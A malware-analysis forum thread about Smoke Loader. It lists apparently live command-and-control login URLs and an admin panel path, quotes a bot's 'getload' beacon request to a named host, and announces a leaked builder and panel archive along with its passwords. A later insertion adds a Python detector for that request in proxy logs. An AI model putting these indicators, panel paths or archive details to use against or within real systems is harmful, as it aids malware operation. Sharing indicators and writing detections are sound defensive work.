Smoke loader samples & live cnc

Forum for analysis and discussion about malware.
leeno
Posts: 45
Joined: Wed Apr 11, 2012 10:19 am

Smoke loader samples & live cnc

Post by leeno » Thu May 10, 2012 9:22 pm

Live CnC Guest Login url for smokeloader

regmexicooo1.ru/ura/guest.php
razorbladesfuture.ru/images/guest.php
beaufortseaa139.ru/qad/guest.php

Xylitol
Global Moderator
Posts: 1665
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society

Re: Smoke loader samples & live cnc

Post by Xylitol » Thu May 10, 2012 9:36 pm

Admin login: /control.php
The headers of razorbladesfuture.ru and regmexicooo1.ru are different "smoke bot"

http://razorbladesfuture.ru/images/imgs/header.png
this one is a smoke bot:

http://beaufortseaa139.ru/qad/imgs/header.png
Anyway, smoke bot and smoke loader have the same structure, or one difference: smoke loader has a 'footer.png' while smoke bot doesn't have one.


Re: Smoke loader samples & live cnc

Post by Xylitol » Thu May 24, 2012 8:50 pm

Smoke Bot from Gold Installs affiliate.

Re: Smoke loader samples & live cnc

Post by Xylitol » Sat Jun 16, 2012 7:48 am

GET /tmp/index.php?cmd=getload&login=783083C3BA00BE137&file=0&sel=77777
Host: italydveris.eu
• dns: 1 ›› ip: 91.217.162.45 - adresse: ITALYDVERIS.EU

https://www.virustotal.com/file/857fc7a ... /analysis/
Smoke Loader
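
A defender-side way to match the request quoted in the post above in web proxy logs, added here as an example and not part of the original thread. The log format, the hex-length bounds and the `example.test` hosts are assumptions; the rule keys only on the shape of the one request shown, since the page does not say what the parameters mean.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Shape of the single request quoted in the post above; what each
# parameter means is not stated on the page, so this keys on structure only.
REQUIRED_KEYS = {"cmd", "login", "file", "sel"}
HEX_ID = re.compile(r"^[0-9A-Fa-f]{8,32}$")  # assumed bounds; the sample is 17 hex chars

def is_getload_request(method, url):
    """True if a request has the same shape as the quoted getload request."""
    if method.upper() != "GET":
        return False
    parts = urlsplit(url)
    if not parts.path.lower().endswith(".php"):
        return False
    q = parse_qs(parts.query, keep_blank_values=True)
    if not REQUIRED_KEYS.issubset(q):
        return False
    return (q["cmd"] == ["getload"]
            and HEX_ID.match(q["login"][0]) is not None
            and q["file"][0].isdigit()
            and q["sel"][0].isdigit())

def scan(lines):
    """Return (client_ip, host) for each matching line.
    Assumed log format: '<time> <client_ip> <method> <url>'."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) != 4:
            continue  # skip malformed lines
        _, client, method, url = fields
        if is_getload_request(method, url):
            hits.append((client, urlsplit(url).hostname))
    return hits

# Constructed proxy log lines; only the first URL is taken from the post.
SAMPLE_LOG = [
    "2012-06-16T07:40:01Z 10.0.0.21 GET http://italydveris.eu/tmp/index.php?cmd=getload&login=783083C3BA00BE137&file=0&sel=77777",
    "2012-06-16T07:40:05Z 10.0.0.22 GET http://intranet.example.test/index.php?cmd=getload",
    "2012-06-16T07:40:09Z 10.0.0.23 POST http://shop.example.test/index.php?cmd=getload&login=ABCDEF0123&file=0&sel=1",
    "2012-06-16T07:40:12Z 10.0.0.24 GET http://wiki.example.test/index.php?cmd=view&login=guest&file=0&sel=2",
]

if __name__ == "__main__":
    for client, host in scan(SAMPLE_LOG):
        print(f"{client} -> {host}")
```

Matching on the query shape rather than the hostname keeps the rule useful after the domain changes, at the cost of needing review for benign applications that happen to use the same parameter names.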


marnie
Posts: 1
Joined: Mon Mar 07, 2016 12:38 am

Re: Smoke loader samples & live cnc

Post by marnie » Sun Apr 17, 2016 1:57 pm

smoke 04.2016 leak (exe; plugins; panel)

defiance.ssl
Posts: 1
Joined: Thu Nov 15, 2012 12:32 am

Re: Smoke loader samples & live cnc

Post by defiance.ssl » Sun Apr 17, 2016 10:14 pm

marnie wrote: smoke 04.2016 leak (exe; plugins; panel)
Attach pass: infected
smoke.7z pass: B_I_R_T_H_D_A_Y
